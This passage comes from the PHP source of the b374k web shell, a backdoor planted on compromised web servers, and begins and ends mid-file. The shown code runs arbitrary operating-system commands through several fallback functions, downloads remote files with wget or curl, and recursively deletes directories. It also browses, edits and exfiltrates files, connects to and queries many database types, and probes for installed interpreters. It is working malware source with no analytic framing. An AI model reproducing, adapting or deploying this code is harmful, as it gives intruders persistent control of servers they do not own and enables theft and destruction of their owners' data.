        $s_p = 'u';
        if(($s_m & 0xC000) == 0xC000)$s_p = 's';
        elseif(($s_m & 0xA000) == 0xA000)$s_p = 'l';
        elseif(($s_m & 0x8000) == 0x8000)$s_p = '-';
        elseif(($s_m & 0x6000) == 0x6000)$s_p = 'b';
        elseif(($s_m & 0x4000) == 0x4000)$s_p = 'd';
        elseif(($s_m & 0x2000) == 0x2000)$s_p = 'c';
        elseif(($s_m & 0x1000) == 0x1000)$s_p = 'p';
        $s_p .= ($s_m & 00400)? 'r':'-';
        $s_p .= ($s_m & 00200)? 'w':'-';
        $s_p .= ($s_m & 00100)? 'x':'-';
        $s_p .= ($s_m & 00040)? 'r':'-';
        $s_p .= ($s_m & 00020)? 'w':'-';
        $s_p .= ($s_m & 00010)? 'x':'-';
        $s_p .= ($s_m & 00004)? 'r':'-';
        $s_p .= ($s_m & 00002)? 'w':'-';
        $s_p .= ($s_m & 00001)? 'x':'-';
        return $s_p;
    }
    else return "???????????";
}
$main_scs = $scs_1.$scs_2.$scs_3.$scs_4.$scs_5.$scs_6."rip"."t>";

// shell command
function exe($s_c){
    $s_out = "";
    $s_c = $s_c." 2>&1";

    if(is_callable('system')) {
        ob_start();
        @system($s_c);
        $s_out = ob_get_contents();
        ob_end_clean();
        if(!empty($s_out)) return $s_out;
    }
    if(is_callable('shell_exec')){
        $s_out = @shell_exec($s_c);
        if(!empty($s_out)) return $s_out;
    }
    if(is_callable('exec')) {
        @exec($s_c,$s_r);
        if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s;
        if(!empty($s_out)) return $s_out;
    }
    if(is_callable('passthru')) {
        ob_start();
        @passthru($s_c);
        $s_out = ob_get_contents();
        ob_end_clean();
        if(!empty($s_out)) return $s_out;
    }
    if(is_callable('proc_open')) {
        $s_descriptorspec = array(
            0 => array("pipe", "r"),
            1 => array("pipe", "w"),
            2 => array("pipe", "w"));
        $s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array());
        if (is_resource($s_proc)) {
            while($s_si = fgets($s_pipes[1])) {
                if(!empty($s_si)) $s_out .= $s_si;
            }
            while($s_se = fgets($s_pipes[2])) {
                if(!empty($s_se)) $s_out .= $s_se;
            }
        }
        @proc_close($s_proc);
        if(!empty($s_out)) return $s_out;
    }
    if(is_callable('popen')){
        $s_f = @popen($s_c, 'r');
        if($s_f){
            while(!feof($s_f)){
                $s_out .= fread($s_f, 2096);
            }
            pclose($s_f);
        }
        if(!empty($s_out)) return $s_out;
    }
    return "";
}
// delete dir and all of its content (no warning !) xp
function rmdirs($s){
    $s = (substr($s,-1)=='/')? $s:$s.'/';
    if($dh = opendir($s)){
        while(($f = readdir($dh))!==false){
            if(($f!='.')&&($f!='..')){
                $f = $s.$f;
                if(@is_dir($f)) rmdirs($f);
                else @unlink($f);
            }
        }
        closedir($dh);
        @rmdir($s);
    }
}
function copys($s,$d,$c=0){
    if($dh = opendir($s)){
        if(!@is_dir($d)) @mkdir($d);
        while(($f = readdir($dh))!==false){
            if(($f!='.')&&($f!='..')){
                if(@is_dir($s.DS.$f)) copys($s.DS.$f,$d.DS.$f);
                else copy($s.DS.$f,$d.DS.$f);
            }
        }
        closedir($dh);
    }
}
// get array of all files from given directory
function getallfiles($s_dir){
    $s_f = glob($s_dir.'*');
    for($s_i = 0; $s_i<count($s_f); $s_i++){
        if(@is_dir($s_f[$s_i])){
            $s_a = glob($s_f[$s_i].DS.'*');
            if(is_array($s_f) && is_array($s_a)) $s_f = array_merge($s_f, $s_a);
        }
    }
    return $s_f;
}
// download file from internet
function dlfile($s_u,$s_p){
    global $s_wget, $s_lwpdownload, $s_lynx, $s_curl;

    if(!preg_match("/[a-z]+:\/\/.+/",$s_u)) return false;
    $s_n = basename($s_u);

    // try using php functions
    if($s_t = @fgc($s_u)){

        if(@is_file($s_p)) unlink($s_p);
        if($s_f = fopen($s_p,"w")){
            fwrite($s_f, $s_t);
            fclose($s_f);
            if(@is_file($s_p)) return true;
        }
    }
    // using wget
    if($s_wget){
        $buff = exe("wget ".$s_u." -O ".$s_p);
        if(@is_file($s_p)) return true;
    }
    // try using curl
    if($s_curl){
        $buff = exe("curl ".$s_u." -o ".$s_p);
        if(@is_file($s_p)) return true;
    }
    // try using lynx
    if($s_lynx){
        $buff = exe("lynx -source ".$s_u." > ".$s_p);
        if(@is_file($s_p)) return true;
    }
    // try using lwp-download
    if($s_lwpdownload){
        $buff = exe("lwp-download ".$s_u." ".$s_p);
        if(@is_file($s_p)) return true;
    }
    return false;
}
// find writable dir
function get_writabledir(){
    if(!$s_d = getenv("TEMP")) if(!$s_d = getenv("TMP")) if(!$s_d = getenv("TMPDIR")){
        if(@is_writable("/tmp")) $s_d = "/tmp/";
        else if(@is_writable(".")) $s_d = ".".DS;
    }
    return cp($s_d);
}
// zip function
function zip($s_srcarr, $s_dest){
    if(!extension_loaded('zip')) return false;
    if(class_exists("ZipArchive")){
        $s_zip = new ZipArchive();
        if(!$s_zip->open($s_dest, 1)) return false;

        if(!is_array($s_srcarr)) $s_srcarr = array($s_srcarr);
        foreach($s_srcarr as $s_src){
            $s_src = str_replace('\\', '/', $s_src);
            if(@is_dir($s_src)){
                $s_files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($s_src), 1);
                foreach($s_files as $s_file){
                    $s_file = str_replace('\\', '/', $s_file);
                    if(in_array(substr($s_file, strrpos($s_file, '/')+1), array('.', '..'))) continue;
                    if (@is_dir($s_file)===true)    $s_zip->addEmptyDir(str_replace($s_src.'/', '', $s_file.'/'));
                    else if (@is_file($s_file)===true) $s_zip->addFromString(str_replace($s_src.'/', '', $s_file), @fgc($s_file));
                }
            }
            elseif(@is_file($s_src) === true) $s_zip->addFromString(basename($s_src), @fgc($s_src));
        }
        $s_zip->close();
        return true;
    }
}
// check shell permission to access program
function check_access($s_lang){
    $s_s = false;
    $ver = "";
    switch($s_lang){
        case "python":
            $s_cek = strtolower(exe("python -h"));
            if(strpos($s_cek,"usage")!==false) $ver = exe("python -V");
            break;
        case "perl":
            $s_cek = strtolower(exe("perl -h"));
            if(strpos($s_cek,"usage")!==false) $ver = exe("perl -e \"print \$]\"");
            break;
        case "ruby":
            $s_cek = strtolower(exe("ruby -h"));
            if(strpos($s_cek,"usage")!==false) $ver = exe("ruby -v");
            break;
        case "node":
            $s_cek = strtolower(exe("node -h"));
            if(strpos($s_cek,"usage")!==false) $ver = exe("node -v");
            break;
        case "nodejs":
            $s_cek = strtolower(exe("nodejs -h"));
            if(strpos($s_cek,"usage")!==false) $ver = exe("nodejs -v");
            break;
        case "gcc":
            $s_cek = strtolower(exe("gcc --help"));
            if(strpos($s_cek,"usage")!==false){
                $s_ver = exe("gcc --version");
                $s_ver = explode("\n",$s_ver);
                if(count($s_ver)>0) $ver = $s_ver[0];
            }
            break;
        case "tar":
            $s_cek = strtolower(exe("tar --help"));
            if(strpos($s_cek,"usage")!==false){
                $s_ver = exe("tar --version");
                $s_ver = explode("\n",$s_ver);
                if(count($s_ver)>0) $ver = $s_ver[0];
            }
            break;
        case "java":
            $s_cek = strtolower(exe("java -help"));
            if(strpos($s_cek,"usage")!==false) $ver = str_replace("\n", ", ", exe("java -version"));
            break;
        case "javac":
            $s_cek = strtolower(exe("javac -help"));
            if(strpos($s_cek,"usage")!==false) $ver = str_replace("\n", ", ", exe("javac -version"));
            break;          
        case "wget":
            $s_cek = strtolower(exe("wget --help"));
            if(strpos($s_cek,"usage")!==false){
                $s_ver = exe("wget --version");
                $s_ver = explode("\n",$s_ver);
                if(count($s_ver)>0) $ver = $s_ver[0];
            }
            break;
        case "lwpdownload":
            $s_cek = strtolower(exe("lwp-download --help"));
            if(strpos($s_cek,"usage")!==false){
                $s_ver = exe("lwp-download --version");
                $s_ver = explode("\n",$s_ver);
                if(count($s_ver)>0) $ver = $s_ver[0];
            }
            break;
        case "lynx":
            $s_cek = strtolower(exe("lynx --help"));
            if(strpos($s_cek,"usage")!==false){
                $s_ver = exe("lynx -version");
                $s_ver = explode("\n",$s_ver);
                if(count($s_ver)>0) $ver = $s_ver[0];
            }
            break;
        case "curl":
            $s_cek = strtolower(exe("curl --help"));
            if(strpos($s_cek,"usage")!==false){
                $s_ver = exe("curl --version");
                $s_ver = explode("\n",$s_ver);
                if(count($s_ver)>0) $ver = $s_ver[0];
            }
            break;
        default:
            return false;
    }
    if(!empty($ver)) $s_s = $ver;
    return $s_s;
}
// explorer, return a table of given dir
function showdir($s_cwd){
    global $s_self, $s_win, $s_posix, $s_tar;

    $s_fname = $s_dname = array();
    $s_total_file = $s_total_dir = 0;

    if($s_dh = @opendir($s_cwd)){
        while($s_file = @readdir($s_dh)){
            if(@is_dir($s_file)) $s_dname[] = $s_file;
            elseif(@is_file($s_file))$s_fname[] = $s_file;
        }
        closedir($s_dh);
    }

    natcasesort($s_fname);
    natcasesort($s_dname);
    $s_list = array_merge($s_dname,$s_fname);

    if($s_win){
        //check if this root directory
        chdir("..");
        if(cp(getcwd())==cp($s_cwd)) array_unshift($s_list, ".");
        chdir($s_cwd);
    }

    $s_path = explode(DS,$s_cwd);
    $s_tree = sizeof($s_path);

    $s_parent = "";
    if($s_tree > 2) for($s_i = 0; $s_i<$s_tree-2; $s_i++) $s_parent .= $s_path[$s_i].DS;
    else $s_parent = $s_cwd;

    $s_owner_html = (!$s_win && $s_posix)? "<th style='width:140px;min-width:140px;'>owner:group</th>":"";
    $s_colspan = (!$s_win && $s_posix)? "5" : "4";
    $s_buff = "<table class='explore sortable'><thead><tr><th style='width:24px;min-width:24px;' class='sorttable_nosort'></th><th style='min-width:150px;'>name</th><th style='width:74px;min-width:74px;'>size</th>".$s_owner_html."<th style='width:80px;min-width:80px;'>perms</th><th style='width:150px;min-width:150px;'>modified</th><th style='width:200px;min-width:200px;' class='sorttable_nosort'>action</th></tr></thead><tbody>";

    
    foreach($s_list as $s_l){
        if(!$s_win && $s_posix){
            $s_name = posix_getpwuid(fileowner($s_l));
            $s_group = posix_getgrgid(filegroup($s_l));
            $s_owner = $s_name['name']."<span class='gaya'>:</span>".$s_group['name'];
            $s_owner_html = "<td style='text-align:center;'>".$s_owner."</td>";
        }

        $s_lhref = $s_lname = $s_laction = "";
        if(@is_dir($s_l)){
            if($s_l=="."){
                $s_lhref = $s_self."cd=".pl($s_cwd);
                $s_lsize = "LINK";
                $s_laction = "<span id='titik1'><a href='".$s_self."cd=".pl($s_cwd)."&find=".pl($s_cwd)."'>find</a> | <a href='".$s_self."cd=".pl($s_cwd)."&x=upload"."'>upl</a> | <a href='".$s_self."cd=".pl($s_cwd)."&edit=".pl($s_cwd)."newfile_1&new=yes"."'>+file</a> | <a href=\"javascript:tukar('titik1','', 'mkdir','newfolder_1');\">+dir</a></span><div id='titik1_form'></div>";
            }
            elseif($s_l==".."){
                $s_lhref = $s_self."cd=".pl($s_parent);
                $s_lsize = "LINK";
                $s_laction = "<span id='titik2'><a href='".$s_self."cd=".pl($s_parent)."&find=".pl($s_parent)."'>find</a> | <a href='".$s_self."cd=".pl($s_parent)."&x=upload"."'>upl</a> | <a href='".$s_self."cd=".pl($s_parent)."&edit=".pl($s_parent)."newfile_1&new=yes"."'>+file</a> | <a href=\"javascript:tukar('titik2','".adds($s_parent)."', 'mkdir','newfolder_1');\">+dir</a></span><div id='titik2_form'></div>";
            }
            else{
                $s_lhref = $s_self."cd=".pl($s_cwd.$s_l.DS);
                $s_lsize = "DIR";
                $s_laction = "<span id='".cs($s_l)."_'><a href='".$s_self."cd=".pl($s_cwd.$s_l.DS)."&find=".pl($s_cwd.$s_l.DS)."'>find</a> | <a href='".$s_self."cd=".pl($s_cwd.$s_l.DS)."&x=upload"."'>upl</a> | <a href=\"javascript:tukar('".cs($s_l)."_','','rename','".adds($s_l)."','".adds($s_l)."');\">ren</a> | <a href='".$s_self."cd=".pl($s_cwd)."&del=".pl($s_l)."'>del</a></span><div id='".cs($s_l)."__form'></div>";
                $s_total_dir++;
            }
            $s_lname = "[ ".$s_l." ]";
            $s_lsizetit = "0";
            $s_lnametit = "dir : ".$s_l;
        }
        else{
            $s_lhref = $s_self."view=".pl($s_cwd.$s_l);
            $s_lname = $s_l;
            $s_lsize = gs($s_l);
            $s_lsizetit = @filesize($s_l);
            $s_lnametit = "file : ".$s_l;
            $s_laction = "<span id='".cs($s_l)."_'><a href='".$s_self."edit=".pl($s_cwd.$s_l)."'>edit</a> | <a href='".$s_self."hexedit=".pl($s_cwd.$s_l)."'>hex</a> | <a href=\"javascript:tukar('".cs($s_l)."_','','rename','".adds($s_l)."','".adds($s_l)."');\">ren</a> | <a href='".$s_self."del=".pl($s_cwd.$s_l)."'>del</a> | <a href='".$s_self."dl=".pl($s_cwd.$s_l)."'>dl</a></span><div id='".cs($s_l)."__form'></div>";
            $s_total_file++;
        }

        $s_cboxval = $s_cwd.$s_l;
        if($s_l=='.') $s_cboxval = $s_cwd;
        if($s_l=='..') $s_cboxval = $s_parent;

        $s_cboxes_id = substr(md5($s_lhref),0,8);
        $s_cboxes = "<input id='".$s_cboxes_id."' name='cbox' value='".hss($s_cboxval)."' type='checkbox' class='css-checkbox' onchange='hilite(this);' /><label for='".$s_cboxes_id."' class='css-label'></label>";

        $s_ltime = filemtime($s_l);
        $s_buff .= "<tr><td style='text-align:center;text-indent:4px;'>".$s_cboxes."</td><td class='xpl' title='".$s_lnametit."' ondblclick=\"return go('".adds($s_lhref)."',event);\"><a href='".$s_lhref."'>".$s_lname."</a></td><td title='".$s_lsizetit."'>".$s_lsize."</td>".$s_owner_html."<td class='ce'>".gp($s_l)."</td><td class='ce' title='".$s_ltime."'>".@date("d-M-Y H:i:s",$s_ltime)."</td><td>".$s_laction."</td></tr>";
    }
    $s_buff .= "</tbody>";

    $s_extract = ""; $s_compress = "";
    if(class_exists("ZipArchive")){
        $s_extract .= "<option value='extractzip'>extract (zip)</option>";
        $s_compress .= "<option value='compresszip'>compress (zip)</option>";
    }
    if($s_tar){
        $s_extract .= "<option value='extracttar'>extract (tar)</option><option value='extracttargz'>extract (tar.gz)</option>";
        $s_compress .="<option value='compresstar'>compress (tar)</option><option value='compresstargz'>compress (tar.gz)</option>";
    }

    $s_extcom = ($s_extract!="" && $s_compress!="")? $s_extract."<option value='' disabled>-</option>".$s_compress:$s_extract.$s_compress;

    $s_buff .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'><input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' /> <label for='checkalll' class='css-label'></label></td><td><form action='".$s_self."' method='post'><select id='massact' class='inputzbut' onchange='massactgo();' style='width:100%;height:20px;margin:0;'><option value='' disabled selected>Action</option><option value='cut'>cut</option><option value='copy'>copy</option><option value='paste'>paste</option><option value='delete'>delete</option><option value='' disabled>-</option><option value='chmod'>chmod</option><option value='touch'>touch</option><option value='' disabled>-</option>".$s_extcom."</select><noscript><input type='button' value='Go !' class='inputzbut' onclick='massactgo();' /></noscript></form></td><td colspan='".$s_colspan."' style='text-align:left;'>Total : ".$s_total_file." files, ".$s_total_dir." Directories<span id='total_selected'></span></td></tr></tfoot></table>";

    return $s_buff;
}
//database related functions
function sql_connect($s_sqltype, $s_sqlhost, $s_sqluser, $s_sqlpass){
    if($s_sqltype == 'mysql'){ 
        if(class_exists('mysqli')) return new mysqli($s_sqlhost, $s_sqluser, $s_sqlpass);
        elseif(function_exists('mysql_connect')) return @mysql_connect($s_sqlhost, $s_sqluser, $s_sqlpass); 
    }
    elseif($s_sqltype == 'mssql'){
        if(function_exists('sqlsrv_connect')){
            $s_coninfo = array("UID"=>$s_sqluser, "PWD"=>$s_sqlpass);
            return @sqlsrv_connect($s_sqlhost,$s_coninfo);
        }
        elseif(function_exists('mssql_connect')) return @mssql_connect($s_sqlhost, $s_sqluser, $s_sqlpass);
    }
    elseif($s_sqltype == 'pgsql'){
        $s_hosts = explode(":", $s_sqlhost);
        if(count($s_hosts)==2){
            $s_host_str = "host=".$s_hosts[0]." port=".$s_hosts[1];
        }
        else $s_host_str = "host=".$s_sqlhost;
        if(function_exists('pg_connect')) return @pg_connect("$s_host_str user=$s_sqluser password=$s_sqlpass");
    }
    elseif($s_sqltype == 'oracle'){ if(function_exists('oci_connect')) return @oci_connect($s_sqluser, $s_sqlpass, $s_sqlhost); }
    elseif($s_sqltype == 'sqlite3'){
        if(class_exists('SQLite3')) if(!empty($s_sqlhost)) return new SQLite3($s_sqlhost);
        else return false;
    }
    elseif($s_sqltype == 'sqlite'){ if(function_exists('sqlite_open')) return @sqlite_open($s_sqlhost); }
    elseif($s_sqltype == 'odbc'){ if(function_exists('odbc_connect')) return @odbc_connect($s_sqlhost, $s_sqluser, $s_sqlpass); }
    elseif($s_sqltype == 'pdo'){
        if(class_exists('PDO')) if(!empty($s_sqlhost)) return new PDO($s_sqlhost, $s_sqluser, $s_sqlpass);
        else return false;
    }
    return false;
}
function sql_query($s_sqltype, $s_query, $s_con){
    if($s_sqltype == 'mysql'){
        if(class_exists('mysqli')) return $s_con->query($s_query);
        elseif(function_exists('mysql_query')) return mysql_query($s_query);
    }
    elseif($s_sqltype == 'mssql'){
        if(function_exists('sqlsrv_query')) return sqlsrv_query($s_con,$s_query);
        elseif(function_exists('mssql_query')) return mssql_query($s_query);
    }
    elseif($s_sqltype == 'pgsql') return pg_query($s_query);
    elseif($s_sqltype == 'oracle') return oci_execute(oci_parse($s_con, $s_query));
    elseif($s_sqltype == 'sqlite3') return $s_con->query($s_query);
    elseif($s_sqltype == 'sqlite') return sqlite_query($s_con, $s_query);
    elseif($s_sqltype == 'odbc') return odbc_exec($s_con, $s_query);
    elseif($s_sqltype == 'pdo') return $s_con->query($s_query);
}
function sql_num_rows($s_sqltype,$s_hasil){
    if($s_sqltype == 'mysql'){
        if(class_exists('mysqli_result')) return $s_hasil->mysqli_num_rows;
        elseif(function_exists('mysql_num_rows')) return mysql_num_rows($s_hasil);
    }
    elseif($s_sqltype == 'mssql'){
        if(function_exists('sqlsrv_num_rows')) return sqlsrv_num_rows($s_hasil);
        elseif(function_exists('mssql_num_rows')) return mssql_num_rows($s_hasil);
    }
    elseif($s_sqltype == 'pgsql') return pg_num_rows($s_hasil);
    elseif($s_sqltype == 'oracle') return oci_num_rows($s_hasil);
    elseif($s_sqltype == 'sqlite3'){
        $s_metadata = $s_hasil->fetchArray();
        if(is_array($s_metadata)) return $s_metadata['count'];
    }
    elseif($s_sqltype == 'sqlite') return sqlite_num_rows($s_hasil);
    elseif($s_sqltype == 'odbc') return odbc_num_rows($s_hasil);
    elseif($s_sqltype == 'pdo') return $s_hasil->rowCount();
}
function sql_num_fields($s_sqltype, $s_hasil){
    if($s_sqltype == 'mysql'){
        if(class_exists('mysqli_result')) return $s_hasil->field_count;
        elseif(function_exists('mysql_num_fields')) return mysql_num_fields($s_hasil);
    }
    elseif($s_sqltype == 'mssql'){
        if(function_exists('sqlsrv_num_fields')) return sqlsrv_num_fields($s_hasil);
        elseif(function_exists('mssql_num_fields')) return mssql_num_fields($s_hasil);
    }
    elseif($s_sqltype == 'pgsql') return pg_num_fields($s_hasil);
    elseif($s_sqltype == 'oracle') return oci_num_fields($s_hasil);
    elseif($s_sqltype == 'sqlite3') return $s_hasil->numColumns();
    elseif($s_sqltype == 'sqlite') return sqlite_num_fields($s_hasil);
    elseif($s_sqltype == 'odbc') return odbc_num_fields($s_hasil);
    elseif($s_sqltype == 'pdo') return $s_hasil->columnCount();
}
function sql_field_name($s_sqltype,$s_hasil,$s_i){
    if($s_sqltype == 'mysql'){
        if(class_exists('mysqli_result')) { $z=$s_hasil->fetch_field();return $z->name;}
        elseif(function_exists('mysql_field_name')) return mysql_field_name($s_hasil,$s_i);
    }
    elseif($s_sqltype == 'mssql'){
        if(function_exists('sqlsrv_field_metadata')){
            $s_metadata = sqlsrv_field_metadata($s_hasil);
            if(is_array($s_metadata)){
                $s_metadata=$s_metadata[$s_i];
            }
            if(is_array($s_metadata)) return $s_metadata['Name'];
        }
        elseif(function_exists('mssql_field_name')) return mssql_field_name($s_hasil,$s_i);
    }
    elseif($s_sqltype == 'pgsql') return pg_field_name($s_hasil,$s_i);
    elseif($s_sqltype == 'oracle') return oci_field_name($s_hasil,$s_i+1);
    elseif($s_sqltype == 'sqlite3') return $s_hasil->columnName($s_i);
    elseif($s_sqltype == 'sqlite') return sqlite_field_name($s_hasil,$s_i);
    elseif($s_sqltype == 'odbc') return odbc_field_name($s_hasil,$s_i+1);
    elseif($s_sqltype == 'pdo'){
        $s_res = $s_hasil->getColumnMeta($s_i);
        return $s_res['name'];
    }
}
function sql_fetch_data($s_sqltype,$s_hasil){
    if($s_sqltype == 'mysql'){
        if(class_exists('mysqli_result')) return $s_hasil->fetch_row();
        elseif(function_exists('mysql_fetch_row')) return mysql_fetch_row($s_hasil);
    }
    elseif($s_sqltype == 'mssql'){
        if(function_exists('sqlsrv_fetch_array')) return sqlsrv_fetch_array($s_hasil,1);
        elseif(function_exists('mssql_fetch_row')) return mssql_fetch_row($s_hasil);
    }
    elseif($s_sqltype == 'pgsql') return pg_fetch_row($s_hasil);
    elseif($s_sqltype == 'oracle') return oci_fetch_row($s_hasil);
    elseif($s_sqltype == 'sqlite3') return $s_hasil->fetchArray(1);
    elseif($s_sqltype == 'sqlite') return sqlite_fetch_array($s_hasil,1);
    elseif($s_sqltype == 'odbc') return odbc_fetch_array($s_hasil);
    elseif($s_sqltype == 'pdo') return $s_hasil->fetch(2);
}
function sql_close($s_sqltype,$s_con){
    if($s_sqltype == 'mysql'){
        if(class_exists('mysqli')) return $s_con->close();
        elseif(function_exists('mysql_close')) return mysql_close($s_con);
    }
    elseif($s_sqltype == 'mssql'){
        if(function_exists('sqlsrv_close')) return sqlsrv_close($s_con);
        elseif(function_exists('mssql_close')) return mssql_close($s_con);
    }
    elseif($s_sqltype == 'pgsql') return pg_close($s_con);
    elseif($s_sqltype == 'oracle') return oci_close($s_con);
    elseif($s_sqltype == 'sqlite3') return $s_con->close();
    elseif($s_sqltype == 'sqlite') return sqlite_close($s_con);
    elseif($s_sqltype == 'odbc') return odbc_close($s_con);
    elseif($s_sqltype == 'pdo') return $s_con = null;
}
if(!function_exists('str_split')){
    function str_split($s_t,$s_s=1){
        $s_a = array();
        for($s_i = 0; $s_i<strlen($s_t);){
            $s_a[] = substr($s_t,$s_i,$s_s);
            $s_i += $s_s;
        }
        return $s_a;
    }
}

// appearance
$s_theme = "dark"; // default is dark
if(isset($_COOKIE['theme'])) $s_theme = $_COOKIE['theme'];
if(isset($_GP['x']) && ($_GP['x']=='switch')){
    if(isset($_COOKIE['theme'])) $s_theme = $_COOKIE['theme'];
    if($s_theme=="bright") $s_theme = "dark";
    else $s_theme = "bright";
    setcookie("theme", $s_theme ,time() + $s_login_time);
}
$s_highlight_dark = array("4C9CAF", "888888", "87DF45", "EEEEEE" , "FF8000");
$s_highlight_bright = array("B36350", "777777", "7820BA", "111111" , "007FFF");

global $s_self, $s_win, $s_posix;

$s_self = "?";
$s_cek1 = basename($_SERVER['SCRIPT_FILENAME']);
$s_cek2 = substr(basename(__FILE__),0,strlen($s_cek1));

if(isset($_COOKIE['b374k_included'])){
    if(strcmp($s_cek1,$s_cek2)!=0) $s_self = $_COOKIE['s_self'];
    else{
        $s_self = "?";
        setcookie("b374k_included", "0" ,time() - $s_login_time);
        setcookie("s_self", $s_self ,time() + $s_login_time);
    }
}
else{
    if(strcmp($s_cek1,$s_cek2)!=0){
        if(!isset($_COOKIE['s_home'])){
            $s_home = "?".$_SERVER["QUERY_STRING"]."&";
            setcookie("s_home", $s_home ,time() + $s_login_time);
        }
        if(isset($s_home)) $s_self = $s_home;
        elseif(isset($_COOKIE['s_home'])) $s_self = $_COOKIE['s_home'];
        setcookie("b374k_included", "1" ,time() + $s_login_time);
        setcookie("s_self", $s_self ,time() + $s_login_time);
    }
    else{
        $s_self = "?";
        setcookie("b374k_included", "0" ,time() - $s_login_time);
        setcookie("s_self", $s_self ,time() + $s_login_time);
    }
}
$s_cwd = "";

if(isset($_GP['|'])) showcode($s_css);
elseif(isset($_GP['!'])) showcode($s_js);

if($s_auth){
    // server software
    $s_software = getenv("SERVER_SOFTWARE");
    // uname -a
    $s_system = php_uname();
    // check os
    $s_win = (strtolower(substr($s_system,0,3)) == "win")? true : false;
    // check for posix
    $s_posix = (function_exists("posix_getpwuid"))? true : false;
    // change working directory
    if(isset($_GP['cd'])){
        $s_dd = $_GP['cd'];
        if(@is_dir($s_dd)){
            $s_cwd = cp($s_dd);
            chdir($s_cwd);
            setcookie("cwd", $s_cwd ,time() + $s_login_time);
        }
        else $s_cwd = isset($_COOKIE['cwd'])? cp($_COOKIE['cwd']):cp(getcwd());;
    }
    else{
        if(isset($_COOKIE['cwd'])){
            $s_dd = ss($_COOKIE['cwd']);
            if(@is_dir($s_dd)){
                $s_cwd = cp($s_dd);
                chdir($s_cwd);
            }
        }
        else $s_cwd = cp(getcwd());
    }

    if(!$s_win && $s_posix){
        $s_userarr = posix_getpwuid(posix_geteuid());
        if(isset($s_userarr['name'])) $s_user = $s_userarr['name'];
        else $s_user = "$";
    }
    else {
        $s_user = get_current_user();
    }

    // prompt style
    $s_prompt = $s_user." &gt;";
    // server ip
    $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
    // your ip ;-)
    $s_my_ip = $_SERVER['REMOTE_ADDR'];
    $s_result = "";

    global $s_python, $s_perl, $s_ruby, $s_node, $s_nodejs, $s_gcc, $s_java, $s_javac, $s_tar, $s_wget, $s_lwpdownload, $s_lynx, $s_curl;

    $s_access = array("s_python", "s_perl", "s_ruby", "s_node", "s_nodejs", "s_gcc", "s_java", "s_javac", "s_tar", "s_wget", "s_lwpdownload", "s_lynx", "s_curl");
    foreach($s_access as $s){
        if(isset($_COOKIE[$s])){ $$s = $_COOKIE[$s]; }
        else{
            if(!isset($_COOKIE['b374k'])){
                $t = explode("_", $s);
                $t = check_access($t[1]);
                if($t!==false){
                    $$s = $t;
                    setcookie($s, $$s ,time() + $s_login_time);
                }
            }
        }
    }

    // download file specified by ?dl=<file>
    if(isset($_GP['dl']) && ($_GP['dl'] != "")){
        ob_end_clean();
        $f = $_GP['dl'];
        $fc = fgc($f);
        header("Content-type: application/octet-stream");
        header("Content-length: ".strlen($fc));
        header("Content-disposition: attachment; filename=\"".basename($f)."\";");
        echo $fc;
        die();
    }
    // massact
    if(isset($_GP['z'])){
        $s_massact = isset($_COOKIE['massact'])? $_COOKIE['massact']:"";
        $s_buffer = isset($_COOKIE['buffer'])? rtrim(ss($_COOKIE['buffer']),"|"):"";
        $s_lists = explode("|", $s_buffer);

        $s_counter = 0;
        if(!empty($s_buffer)){
            if($_GP['z']=='moveok'){
                foreach($s_lists as $s_l) if(rename($s_l,$s_cwd.basename($s_l))) $s_counter++;
                if($s_counter>0) $s_result .= notif($s_counter." items moved");
                else $s_result .= notif("No items moved");
            }
            elseif($_GP['z']=='copyok'){
                foreach($s_lists as $s_l){
                    if(@is_dir($s_l)){
                        copys($s_l,$s_cwd.basename($s_l));
                        if(file_exists($s_cwd.basename($s_l))) $s_counter++;
                    }
                    elseif(@is_file($s_l)){
                        copy($s_l,$s_cwd.basename($s_l));
                        if(file_exists($s_cwd.basename($s_l))) $s_counter++;
                    }
                }
                if($s_counter>0) $s_result .= notif($s_counter." items copied");
                else $s_result .= notif("No items copied");
            }
            elseif($_GP['z']=='delok'){
                foreach($s_lists as $s_l){
                    if(@is_file($s_l)){
                        if(unlink($s_l)) $s_counter++;
                    }
                    elseif(@is_dir($s_l)){
                        rmdirs($s_l);
                        if(!file_exists($s_l)) $s_counter++;
                    }
                }
                if($s_counter>0) $s_result .= notif($s_counter." items deleted");
                else $s_result .= notif("No items deleted");
            }
            elseif(isset($_GP['chmodok'])){
                $s_mod = octdec($_GP['chmodok']);
                foreach($s_lists as $s_l) if(chmod($s_l,$s_mod)) $s_counter++;
                if($s_counter>0) $s_result .= notif($s_counter." items changed mode to ".decoct($s_mod));
                else $s_result .= notif("No items modified");
            }
            elseif(isset($_GP['touchok'])){
                $s_datenew = strtotime($_GP['touchok']);
                foreach($s_lists as $s_l) if(touch($s_l,$s_datenew)) $s_counter++;
                if($s_counter>0) $s_result .= notif($s_counter." items changed access and modification time to ".@date("d-M-Y H:i:s",$s_datenew));
                else $s_result .= notif("No items modified");
            }
            elseif(isset($_GP['compresszipok'])){
                $s_file = $_GP['compresszipok'];
                if(zip($s_lists, $s_file)) $s_result .= notif("Archive created : ".hss($s_file));
                else $s_result .= notif("Error creating archive file");
            }
            elseif(isset($_GP['compresstarok'])){
                $s_lists_ = array();
                $s_file = $_GP['compresstarok'];
                $s_file = basename($s_file);

                $s_lists__ = array_map("basename", $s_lists);
                $s_lists_ = array_map("pf", $s_lists__);
                exe("tar cf \"".$s_file."\" ".implode(" ", $s_lists_));

                if(@is_file($s_file)) $s_result .= notif("Archive created : ".hss($s_file));
                else $s_result .= notif("Error creating archive file");
            }
            elseif(isset($_GP['compresstargzok'])){
                $s_lists_ = array();
                $s_file = $_GP['compresstargzok'];
                $s_file = basename($s_file);

                $s_lists__ = array_map("basename", $s_lists);
                $s_lists_ = array_map("pf", $s_lists__);
                exe("tar czf \"".$s_file."\" ".implode(" ", $s_lists_));

                if(@is_file($s_file)) $s_result .= notif("Archive created : ".hss($s_file));
                else $s_result .= notif("Error creating archive file");
            }
            elseif(isset($_GP['extractzipok'])){
                $s_file = $_GP['extractzipok'];
                $zip = new ZipArchive();
                foreach($s_lists as $f){
                    $s_target = $s_file.basename($f,".zip");
                    if($zip->open($f)){
                        if(!@is_dir($s_target)) @mkdir($s_target);
                        if($zip->extractTo($s_target)) $s_result .= notif("Files extracted to ".hss($s_target));
                        else $s_result .= notif("Error extrating archive file");
